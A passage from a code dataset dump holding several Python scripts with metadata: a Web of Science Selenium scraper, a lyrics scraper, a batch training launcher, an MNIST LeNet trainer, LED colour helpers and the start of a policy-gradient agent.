"line_number": 516, "usage_type": "call"}, {"api_name": "__init__.mean_ap", "line_number": 520, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 543, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 543, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 544, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 544, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 604, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 636, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 637, "usage_type": "call"}, {"api_name": "time.time", "line_number": 667, "usage_type": "call"}, {"api_name": "time.time", "line_number": 669, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 670, "usage_type": "call"}]} +{"seq_id": "200438019", "text": "from re import L\r\nimport requests\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium import webdriver\r\nfrom lxml import etree\r\nimport os\r\nfrom time import sleep\r\nimport xlrd\r\nimport win32api\r\nimport win32con\r\nimport xlsxwriter as xw\r\nfrom openpyxl import load_workbook\r\n\r\ndef Load_number_ExcelDone(path,list,n=0):\r\n data=xlrd.open_workbook(path)\r\n table=data.sheets()[0]\r\n nrows=table.nrows\r\n for i in range(nrows):\r\n try:list.append(int(float(table.row_values(i)[n])))\r\n except:\r\n continue\r\n print(list)\r\n\r\ndef load_Content_Excel(path,lists,number=9999,n=7):\r\n data=xlrd.open_workbook(path)\r\n table=data.sheets()[0]\r\n nrows=table.nrows\r\n if nrows>number:\r\n nrows=number\r\n for i in range(nrows):\r\n if i<=1:\r\n continue\r\n elif table.row_values(i)[n]==table.row_values(i-1)[n]:\r\n continue\r\n else :\r\n s=paper(i,table.row_values(i)[n],0,0)\r\n 
lists.append(s)\r\n\r\ndef add_information_excel(filepath,paper):\r\n workbook=load_workbook(filepath+'.xlsx')\r\n wb=workbook.active\r\n for p in paper:\r\n column_n='A'+str(p.n)\r\n column_name='B'+str(p.n)\r\n column_wos='C'+str(p.n)\r\n column_url='D'+str(p.n)\r\n wb[column_n]=p.n\r\n wb[column_name]=p.name\r\n wb[column_wos]=p.wos\r\n wb[column_url]=p.url\r\n workbook.save(filepath+'.xlsx')\r\n\r\ndef savepage_pywin32():\r\n win32api.keybd_event(17, 0, 0, 0) # 按下ctrl\r\n win32api.keybd_event(83, 0, 0, 0) # 按下s\r\n win32api.keybd_event(83, 0, win32con.KEYEVENTF_KEYUP, 0) # 释放s\r\n\r\n sleep(1)\r\n\r\n win32api.keybd_event(86, 0, 0, 0) # 按下v\r\n win32api.keybd_event(17, 0, win32con.KEYEVENTF_KEYUP, 0) # 释放ctrl\r\n\r\n sleep(1)\r\n win32api.keybd_event(13, 0, 0, 0) # 按下enter\r\n win32api.keybd_event(13, 0, win32con.KEYEVENTF_KEYUP, 0) # 释放enter\r\n\r\ndef search(kw):\r\n #seach in sci\r\n search_input=brs.find_element_by_xpath('//input[@data-ta=\"search-criteria-input\"]') \r\n try: \r\n wind=brs.find_element_by_id('pendo-close-guide-8fdced48')\r\n wind.click() #find serch box\r\n search_input.click()\r\n search_input.clear()\r\n search_input.send_keys(kw) \r\n search_input.send_keys(Keys.ENTER) #input keywords\r\n butn=brs.find_element_by_xpath('//span[@class=\"mat-button-wrapper\"]') #find search button\r\n butn.click() \r\n except:\r\n search_input.click()\r\n search_input.clear()\r\n search_input.send_keys(kw) \r\n search_input.send_keys(Keys.ENTER) #input keywords\r\n butn=brs.find_element_by_xpath('//span[@class=\"mat-button-wrapper\"]') #find search button\r\n butn.click() #click serch button and serch \r\n\r\ndef closewind(s):\r\n brs.find_element_by_id(s).click\r\n\r\ndef getpaper_wos_url(source):\r\n tree=etree.HTML(source)\r\n download=tree.xpath('//app-records-list//a[@data-ta=\"summary-record-title-link\"]/@href')[0]\r\n Download='https://www.webofscience.com'+download\r\n return Download\r\n\r\ndef getHTML(url,headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'}):\r\n c=requests.get(url=url,headers=headers).content\r\n return c\r\n\r\ndef getfulltext_url(page):\r\n tree=etree.HTML(page)\r\n c=tree.xpath('//app-full-record-links//a/@href')[0]\r\n return c\r\n\r\ndef getsource(url,broser):\r\n broser.get(url)\r\n page_text=broser.page_source\r\n print('page_souce load successful')\r\n return page_text\r\n\r\ndef SaveHtml(HTML,Filename):\r\n if not os.path.exists('./paper/HTML'):\r\n os.makedirs('./paper/HTML')\r\n Filename=Filename+'.html'\r\n with open('./paper/HTML/'+Filename,'wb',encoding='utf-8') as fp:\r\n fp.write(HTML)\r\n return 'save successful'\r\n\r\n\r\ndef judge_filename(n):\r\n c=n-n%50\r\n # print(c)\r\n d=c+50\r\n X=str(c)+'-'+str(d)+'/'\r\n return X\r\n\r\n\r\n\r\nclass paper:\r\n def __init__(self,n,name,wos,url):\r\n self.n=n\r\n self.name=name\r\n self.wos=wos\r\n self.url=url\r\n\r\n\r\n\r\n\r\nbrs = webdriver.Chrome(executable_path='./chromedriver/chromedriver')\r\n# brs.quit()\r\nurl='https://www.webofscience.com/wos/woscc/basic-search'\r\n", "sub_path": "paper-ssr1.0/#code/defination.py", "file_name": "defination.py", "file_ext": "py", "file_size_in_byte": 4473, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "xlrd.open_workbook", "line_number": 15, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 25, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", 
"line_number": 40, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 54, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 55, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 56, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 56, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 58, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 60, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 61, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 61, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 64, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 65, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 65, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 76, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 76, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 83, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 83, "usage_type": "name"}, {"api_name": "lxml.etree.HTML", "line_number": 91, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 91, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 101, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 101, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 113, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 139, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 139, "usage_type": "name"}]} +{"seq_id": "171700392", "text": "from bs4 import BeautifulSoup\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\n\n\nheaders = {\n\t\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36\"\n}\n\ndef make_url_metro(song_title, artist_name):\n\treturn 'http://www.metrolyrics.com/' + song_title.replace(' ', '-') + '-lyrics-' + artist_name.replace(' ', '-')\n\ndef make_url_az(song_title, artist_name):\n\treturn f'https://www.azlyrics.com/lyrics/{artist_name}/{song_title}.html'\n\ndef simple_get(url):\n\ttry:\n\t\twith closing(get(url, headers=headers)) as resp:\n\t\t\t# print(resp.status_code, resp.history)\n\t\t\tif resp.status_code == 200:\n\t\t\t\tif not resp.history:\n\t\t\t\t\treturn resp.content\n\t\t\t\telif resp.history[0].status_code == 301:\n\t\t\t\t\treturn resp.content\n\t\t\t\telse:\n\t\t\t\t\tprint('Redirection -> 302: lyrics not found!')\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint('Err -> 404: lyrics not found!')\n\t\t\t\treturn None\n\n\texcept RequestException:\n\t\tprint('Internet connection is needed to download the lyrics')\n\t\treturn None\n\n\ndef lyricsFinderMetro(song_title, artist_name):\n\turl = make_url_metro(song_title.strip(), artist_name.strip())\n\traw_html = simple_get(url)\n\tif raw_html is None:\n\t\tprint('lyrics Not 
Found.')\n\t\treturn None\n\n\thtml = BeautifulSoup(raw_html, 'html.parser')\n\t\n\tlyrics = ''\n\n\tfor p in html.select('p'):\n\t\ts = [str(i) for i in p.contents]\n\t\ts = ''.join(s)\n\t\ts = s.replace('\\n', '\\n\\n')\n\t\tif p.has_attr('class') and p['class'][0] == 'verse':\n\t\t\tlyrics += '\\n\\n{}\\n\\n'.format(s)\n\t\t\tif p.findAll('br'):\n\t\t\t\tlyrics += '\\n
'\n\n\treturn lyrics\n\n\ndef lyricsFinderAz(song_title, artist_name):\n\tsong_title = song_title.replace(\"'\", \"\")\n\tsong_title = ''.join(song_title.strip().lower().split())\n\tartist_name = ''.join(artist_name.strip().lower().split())\n\tprint(song_title, artist_name)\n\turl = make_url_az(song_title, artist_name)\n\traw_html = simple_get(url)\n\tif raw_html is None:\n\t\tprint('lyrics Not Found.')\n\t\treturn None\n\n\thtml = BeautifulSoup(raw_html, 'html.parser')\n\n\tlyrics = ''\n\tfor div in html.select('div'):\n\t\tif not div.has_attr('class'):\n\t\t\tlyrics = str(div)\n\n\treturn lyrics\n\n\n\n\n\n\n\n", "sub_path": "friends_fire/lyricsFinder.py", "file_name": "lyricsFinder.py", "file_ext": "py", "file_size_in_byte": 2196, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "contextlib.closing", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.exceptions.RequestException", "line_number": 33, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "521388867", "text": "import argparse\nimport os\nimport datetime\nimport json\nimport subprocess\n\ndef create_cmd(data, path):\n cmd = (\"python3 train.py -g \"+data[\"game\"]+\" -df \"+path+\"/\"+\n \" --e \"+str(data[\"e\"])+\n \" --alpha \"+str(data[\"alpha\"])+\n \" -lr \"+str(data[\"initial_lr\"])+\n \" -lra \"+str(data[\"lr_annealing_steps\"])+\n \" --entropy \"+str(data[\"entropy_regularisation_strength\"])+\n \" --clip_norm \"+str(data[\"clip_norm\"])+\n \" --clip_norm_type \"+str(data[\"clip_norm_type\"])+\n \" --gamma \"+str(data[\"gamma\"])+\n \" --max_global_steps \"+str(data[\"max_global_steps\"])+\n \" --max_local_steps \"+str(data[\"max_local_steps\"])+\n \" --arch \"+str(data[\"arch\"])+\n \" -ec \"+str(data[\"emulator_counts\"])+\n \" -ew \"+str(data[\"emulator_workers\"])+\n \" --epsilon \"+str(data[\"epsilon\"])+\n \" --softmax_temp \"+str(data[\"softmax_temp\"])+\n \" --annealed_steps \"+str(data[\"annealed_steps\"])+\n \" --keep_percentage \"+str(data[\"keep_percentage\"])+\n \" --max_repetition \"+str(data[\"max_repetition\"])+\n \" --nb_choices \"+str(data[\"nb_choices\"])+\n \" --checkpoint_interval \"+str(data[\"checkpoint_interval\"])+\n \" --activation \"+str(data[\"activation\"])+\n \" --alpha_leaky_relu \"+str(data[\"alpha_leaky_relu\"]))\n if data[\"single_life_episodes\"] : cmd += \" --single_life_episodes\"\n if data[\"random_start\"] : cmd += \" --random_start\"\n if data[\"egreedy\"] : cmd += \" --egreedy\"\n if data[\"annealed\"] : cmd += \" --annealed\"\n if data[\"rgb\"] : cmd += \" --rgb\"\n return cmd\n\ndef create_chpt_cmd(args, path):\n cmd = (\"nohup python3 scripts/checkpoints.py \"+\n \" -df \"+path+\"/\"\n \" -t \"+str(args.time)+\n \" &> nohupLogs/saveCheckpoints.out &\")\n return cmd\n\n\ndef main(args):\n pathSrc = args.folder\n for folder in os.listdir(pathSrc):\n i = datetime.datetime.now()\n path = args.destination+str(i.year)+\"-\"+str(i.month)+\"-\"+str(i.day)+\"-\"+folder\n if not os.path.exists(path):\n os.makedirs(path)\n for f in os.listdir(pathSrc+\"/\"+folder):\n with open(pathSrc+\"/\"+folder+\"/\"+f, 'r') as d :\n data = json.load(d)\n pathDest = path + \"/\"+f[:-5]\n subprocess.call(create_chpt_cmd(args, pathDest), shell = True)\n subprocess.call(create_cmd(data, pathDest), shell = True)\n 
subprocess.call((\"touch \"+pathDest+\"/checkpoints_saved/STOP\"), shell = True)\n\n\ndef get_arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', default='toTrain', type=str,\n help='Folder where to find the JSON files with the training options', dest='folder')\n parser.add_argument('-t', default=1800, type=int,\n help='Period of time btw checkpoints save', dest='time')\n parser.add_argument('-d', default='logs/', type=str,\n help='Folder where to save the training information', dest='destination')\n return parser\n\nif __name__ == '__main__':\n args = get_arg_parser().parse_args()\n main(args)\n", "sub_path": "scripts/batchTrain.py", "file_name": "batchTrain.py", "file_ext": "py", "file_size_in_byte": 3306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 52, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 53, "usage_type": "call"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 57, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 58, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 59, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "462920404", "text": "#%%\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nimport torchvision\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport cv2\n\nbatch_size = 100\n#%%\n# train dataset\ntrain_dataset = datasets.MNIST(root='./num/',\n train=True,\n transform=transforms.ToTensor(),\n download=True)\n# test dataset\ntest_dataset = datasets.MNIST(root='./num/',\n train=False,\n transform=transforms.ToTensor(),\n download=True)\n\n#%%\n# Dataset to load dataset name\n# Batch_size to set image number\n# In the loading the dataset will be shuffle and be packed\n\n# Load the train_dataset\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True)\n# Load the test_dataset\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=True)\n\n# Build a dataLoader\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=True)\n\n\n#%% Make the single image visual\nimages, labels = next(iter(train_loader))\nimg = torchvision.utils.make_grid(images)\n\nimg = img.numpy().transpose(1, 2, 0)\nstd = [0.5, 0.5, 0.5]\nmean = [0.5, 0.5, 0.5]\nimg = img * std + mean\nprint(labels)\ncv2.imshow('win', img)\nkey_pressed = cv2.waitKey(0)\n\n#%%\n# Convolution layer use torch.nn.Conv2d\n# Activating layer use torch.nn.ReLU\n# Pooling layer use torch.nn.MaxPool2d\n# Max_connection layer use torch.nn.Linear\n\nclass LeNet(nn.Module):\n def __init__(self):\n super(LeNet, self).__init__()\n self.conv1 = 
nn.Sequential(nn.Conv2d(1, 6, 3, 1, 2), nn.ReLU(),\n nn.MaxPool2d(2, 2))\n\n self.conv2 = nn.Sequential(nn.Conv2d(6, 16, 5), nn.ReLU(),\n nn.MaxPool2d(2, 2))\n\n self.fc1 = nn.Sequential(nn.Linear(16 * 5 * 5, 120),\n nn.BatchNorm1d(120), nn.ReLU())\n\n self.fc2 = nn.Sequential(\n nn.Linear(120, 84),\n nn.BatchNorm1d(84),\n nn.ReLU(),\n nn.Linear(84, 10)) # the 10 is because of the label between 0-9\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x.view(x.size()[0], -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\n#%%\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nbatch_size = 64\nLR = 0.001\n\nnet = LeNet().to(device)\n# Loss function use the cross entropy loss\ncriterion = nn.CrossEntropyLoss()\n# optimizer use the adam adaptive optimization algorithm\noptimizer = optim.Adam(net.parameters(), lr=LR,)\n\nepoch = 1\nif __name__ == '__main__':\n for epoch in range(epoch):\n sum_loss = 0.0\n for i, data in enumerate(train_loader):\n inputs, labels = data\n inputs, labels = Variable(inputs).cuda(), Variable(labels).cuda()\n optimizer.zero_grad() # Make the gradient to zero\n outputs = net(inputs) # Make the data into the net and forward\n loss = criterion(outputs, labels) # Get the loss function\n loss.backward() # backward broadcast\n optimizer.step() # update the para by the gradient\n\n # print(loss)\n sum_loss += loss.item()\n if i % 100 == 99:\n print('[%d,%d] loss:%.03f' %\n (epoch + 1, i + 1, sum_loss / 100))\n sum_loss = 0.0\n\n#%% Test model\nnet.eval()\ncorrect = 0\ntotal = 0\nfor data_test in test_loader:\n images, labels = data_test\n images, labels = Variable(images).cuda(), Variable(labels).cuda()\n output_test = net(images)\n _, predicted = torch.max(output_test, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum()\nprint(\"correct1: \", correct)\nprint(\"Test acc: {0}\".format(correct.item() / len(test_dataset)))\n\n", "sub_path": "train_mnist.py", "file_name": "train_mnist.py", "file_ext": "py", "file_size_in_byte": 4492, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torchvision.datasets.MNIST", "line_number": 15, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 15, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 17, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 20, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 20, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torchvision.utils.make_grid", "line_number": 50, "usage_type": "call"}, 
{"api_name": "torchvision.utils", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "315667420", "text": "\n# coding: utf-8\n\n# In[2]:\n\nimport numpy as np\nimport csv\nimport time\n#import matplotlib\n#import matplotlib.pyplot as plt\nimport datetime\n#import pandas as pd\nfrom LEDsetup import *\n\n\n# ### Open datafiles\n\n# In[31]:\n\ndef OpenDailyData(filename):\n time_stamp = []\n value = []\n with open(filename) as f:\n cf = csv.DictReader(f, fieldnames=['time_stamp', 
'value'])\n for row in cf:\n try:\n time_stamp.append(datetime.datetime.strptime(row['time_stamp'], \"%Y-%m-%d\"))\n \n except:\n time_stamp.append(datetime.datetime.strptime(row['time_stamp'], \"%Y-%m-%d %H:%M:%S\"))\n value.append(float(row['value']))\n \n \n return(time_stamp, value)\n\n\n# In[ ]:\n\ndef OpenMonthlyData(filename):\n month = []\n year = []\n value = []\n with open(filename) as f:\n cf = csv.DictReader(f, fieldnames=['month','year', 'value'])\n for row in cf:\n #print(row)\n month.append(row['month'])\n year.append(row['year'])\n value.append(float(row['value']))\n \n \n return(month, year, value)\n\n\n# ### Generating color scale\n\n# In[19]:\n\n#def ColorScale(steps, color1, color2):\n #clrs = []\n #inc = 1/(steps-1)\n #print(inc)\n \n #for i in range(steps):\n #new_color = (int(color1[0]*i*inc+color2[0]*(steps-i-1)*inc),\n #int(color1[1]*i*inc+color2[1]*(steps-i-1)*inc), \n #int(color1[2]*i*inc+color2[2]*(steps-i-1)*inc))\n #print(new_color)\n #clrs.append(new_color)\n\n \n #return clrs\n\n\n\n# In[22]:\n\ndef ColorScaler(color_low, color_high, value, min_value = 0, max_value = 0):\n if((min_value == 0) & (max_value == 0)):\n min_value = min(value)\n max_value = max(value)\n clr_data = []\n \n for val in value:\n ratio = (val - min_value)/(max_value-min_value)\n new_color = (int(color_high[0]*ratio+color_low[0]*(1-ratio)),\n int(color_high[1]*ratio+color_low[1]*(1-ratio)), \n int(color_high[2]*ratio+color_low[2]*(1-ratio)))\n #print(new_color)\n clr_data.append(new_color)\n \n return clr_data\n\n\n# In[26]:\n\ndef NumScaler(led1, led2, value, min_value = 0, max_value = 0):\n if((min_value == 0) & (max_value == 0)):\n min_value = min(value)\n max_value = max(value)\n \n num_data = []\n \n for val in value:\n ratio = (val - min_value)/(max_value-min_value)\n new_num = led1 + int((led2-led1)*ratio)\n num_data.append(new_num)\n\n \n return num_data\n\n\n# In[28]:\n\ndef Flash(num_flashes, delay, color, led1 = 0, led2 = 79):\n for i in range(num_flashes):\n led.fill(color, led1, led2)\n led.update()\n time.sleep(delay)\n led.fill((0,0,0), led1, led2)\n led.update()\n time.sleep(delay)\n\n\n\n# In[ ]:\n\ndef Pulse(num_pulses, color, led1 = 0, led2 = 79):\n ## Step-up intensity by 10% increments, then step down by the same every 0.1 seconds. total time = 2 sec\n \n intensity = np.arange(0,1.1,0.1) \n\n for i in intensity:\n color_new = (int(color[0]*i),int(color[1]*i),int(color[2]*i)) \n # There is probably a more elegant way to do this.. 
\n #print color_new\n led.fill(color_new, led1, led2)\n led.update()\n time.sleep(0.1)\n\n for i in reversed(intensity):\n color_new = (int(color[0]*i),int(color[1]*i),int(color[2]*i)) \n #print color_new\n led.fill(color_new, led1, led2)\n led.update()\n time.sleep(0.1) \n\n", "sub_path": "DunnePilot/DataFunctions.py", "file_name": "DataFunctions.py", "file_ext": "py", "file_size_in_byte": 3612, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "csv.DictReader", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 44, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 119, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 131, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "10027459", "text": "import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nfrom gym import logger\nfrom .utils import plot_figure, check_reward, discount_reward, weight_init\n\n\nclass PGNet(nn.Module):\n def __init__(self, input_dims, fc1_dims, fc2_dims, n_actions):\n super(PGNet, self).__init__()\n self.fc1 = nn.Linear(input_dims, fc1_dims)\n self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n self.fc3 = nn.Linear(fc2_dims, n_actions)\n\n def forward(self, observation):\n x = F.relu(self.fc1(observation))\n x = F.relu(self.fc2(x))\n out = self.fc3(x)\n return out\n\n\nclass PGAgent(object):\n def __init__(self, lr, input_dims, n_actions, env_name,\n ckpt_save_path, gamma=0.99, fc1_dims=128, fc2_dims=256):\n self.reward_memory = []\n self.action_memory = []\n self.score_history = [] # episode history for plot\n self.gamma = gamma # discount factor\n self.cur_episode = 0\n self.env_name = env_name\n self.agent_name = f\"PG_{env_name}\"\n self.ckpt_save_path = ckpt_save_path\n self.actor = PGNet(input_dims, fc1_dims, fc2_dims, n_actions)\n self.actor.apply(weight_init)\n self.optimizer = optim.Adam(self.actor.parameters(), lr=lr)\n self.device = torch.device(\n 'cuda:0' if torch.cuda.is_available() else 'cpu')\n self.actor.to(self.device)\n\n def __str__(self):\n return self.agent_name\n\n def predict(self, observation):\n x = torch.Tensor(observation).to(self.device)\n probabilities = F.softmax(self.actor.forward(x), dim=-1)\n action_probs = torch.distributions.Categorical(probabilities)\n action = action_probs.sample()\n log_probs = action_probs.log_prob(action)\n self.action_memory.append(log_probs)\n\n return action.item()\n\n def store_rewards(self, reward):\n self.reward_memory.append(reward)\n\n def choose_action(self, observation):\n x = torch.Tensor(observation).to(self.device)\n _, action = torch.max(self.actor.forward(x), dim=-1)\n return action.item()\n\n def clear_memory(self):\n self.action_memory = []\n self.reward_memory = []\n\n def save_model(self, path, episode):\n torch.save({\n 'model_state_dict': self.actor.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 
